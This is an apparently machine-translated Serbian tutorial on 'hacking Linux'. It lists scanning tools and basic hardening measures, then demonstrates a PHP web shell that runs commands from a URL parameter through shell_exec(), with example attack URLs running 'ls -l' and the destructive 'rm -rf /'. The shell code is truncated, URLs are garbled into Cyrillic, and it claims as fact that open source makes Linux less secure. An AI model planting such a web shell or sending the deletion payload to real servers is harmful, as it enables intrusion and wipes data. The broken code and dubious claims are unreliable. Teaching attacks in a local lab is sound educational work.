Линук је најчешће коришћени серверски оперативни систем, посебно за веб сервере. Отворени је извор; то значи да свако може имати приступ изворном коду. То га чини мање сигурним у поређењу са другим оперативним системима јер нападачи могу проучавати изворни код да би пронашли рањивости . Линук за хакере подразумева искоришћавање ових рањивости ради неовлашћеног приступа систему.
У овом чланку ћемо вас упознати са оним што је Линук, његовим сигурносним рањивостима, хаковањем са Убунтуом и мерама за противљење које можете применити.
Теме обрађене у овом упутству
- Кратка белешка о Линуку
- Линук Хацкинг Тоолс
- Како спречити хаковање Линука
- Активност хаковања: Хакирајте Линук систем користећи ПХП
Кратка белешка о Линуку
Линук је оперативни систем отвореног кода . Постоји много дистрибуција оперативних система заснованих на Линук-у, као што су Редхат, Федора и Убунту итд. За разлику од осталих оперативних система, Линук је мање сигуран када је реч о сигурности. То је зато што је изворни код доступан слободно, па га је лако проучити ради рањивости и искористити га у поређењу са другим оперативним системима који нису отворени изворни код. Линук се може користити као сервер, радна површина, таблет или оперативни систем мобилних уређаја.
Линук програмима се може управљати помоћу ГУИ-ја или наредби. Линук наредбе за Кали Линук хаковање су ефикасније и ефикасније у поређењу са коришћењем ГУИ-а. Из тог разлога помаже познавање основних Линук наредби за хаковање.
Погледајте ове водиче хттпс://ввв.гуру99.цом/уник-линук-туториал.хтмл о томе како започети рад са Кали Линук хаковима.
Линук Хацкинг Тоолс
- Нессус - овај алат се може користити за хаковање Убунту-а, скенирање подешавања конфигурације, закрпе и мреже итд. Може се наћи на хттпс://ввв.тенабле.цом/продуцтс/нессус
- НМап. Овај алат се може користити за надгледање хостова који су покренути на серверу и услуга које користе. Такође се може користити за скенирање портова. Може се наћи на хттпс://нмап.орг/
- САРА - САРА је скраћеница за истраживач-помоћник ревизора безбедности. Као што и само име говори, овај алат се може користити за ревизију мрежа од претњи као што су СКЛ Ињецтион, КССС итд. Може се наћи на хттп://ввв-арц.цом/сара/сара.хтмл
Горња листа није исцрпна; даје вам идеју о алатима доступним за хаковање и хаковање Линук система Убунту.
Како спречити хаковање Линука
Линук Хацкинг користи предности рањивости оперативног система. Организација може да усвоји следећу политику да би се заштитила од таквих напада.
- Управљање закрпама - закрпе исправљају грешке које нападачи искоришћавају да би угрозили систем. Добра политика управљања закрпама обезбедиће да стално примењујете релевантне закрпе на свој систем.
- Правилна конфигурација ОС-а - други прегледи користе предности слабости у конфигурацији сервера. Неактивна корисничка имена и демони треба да буду онемогућени. Треба променити подразумеване поставке као што су уобичајене лозинке за апликацију, подразумевана корисничка имена и неки бројеви портова.
- Систем за откривање упада - такви алати се могу користити за откривање неовлашћеног приступа систему. Неки алати имају могућност откривања и спречавања таквих напада.
Активност хаковања: Хаковање Убунту Линук система помоћу ПХП-а
У овом практичном сценарију научићемо како хаковати Убунту и пружићемо вам основне информације о томе како ПХП можете користити за компромитовање Линука. Нећемо циљати ниједну жртву. Ако желите да испробате, можете да инсталирате ЛАМПП на ваш локални рачунар.
ПХП долази са две функције које се могу користити за извршавање Линук хакерских наредби. Има функције екец () и схелл_екец (). Функција екец () враћа последњу линију излаза наредбе, док схелл_екец () враћа цео резултат наредбе као низ.
У сврху демонстрације, претпоставимо да менаџери нападача преносе следећу датотеку на веб сервер.
$cmd";$output = shell_exec($cmd);echo "$output";?>
ОВДЕ,
Горња скрипта добија команду из ГЕТ променљиве назване цмд. Наредба се извршава помоћу схелл_екец () и резултати се враћају у прегледач.
Горњи код се може искористити помоћу следеће УРЛ адресе
хттп: //лоцалхост/цп/консоле.пхп? цмд = лс% 20-л
ОВДЕ,
- „… Консоле.пхп? Цмд = лс% 20-л“ додељује вредност лс -л променљивој цмд .
Команда у Убунту-у за хаковање сервера извршиће се као
shell_exec('ls -l') ;
Извршење горњег кода на веб серверу даје резултате сличне следећим.
Горња команда једноставно приказује датотеке у тренутном директоријуму и дозволе
Претпоставимо да нападач прође следећу команду
rm -rf /
ОВДЕ,
- „Рм“ уклања датотеке
- „Рф“ чини да се рм наредба извршава у рекурзивном режиму. Брисање свих директоријума и датотека
- „/“ Упућује команду да започне брисање датотека из основног директоријума
УРЛ напада изгледао би отприлике овако
хттп: //лоцалхост/цп/консоле.пхп? цмд = рм% 20-рф% 20 /
Резиме
- Линук је популаран оперативни систем за сервере, радне површине, таблете и мобилне уређаје.
- Линук је отворен извор, а изворни код може добити свако. Ово олакшава уочавање рањивости. То је један од најбољих ОС-а за хакере.
- Основне и мрежне наредбе за хакирање у Убунтуу су драгоцјене за Линук хакере.
- Рањивости су слабост коју се може искористити за угрожавање система.
- Добра заштита може помоћи у заштити система од нападача.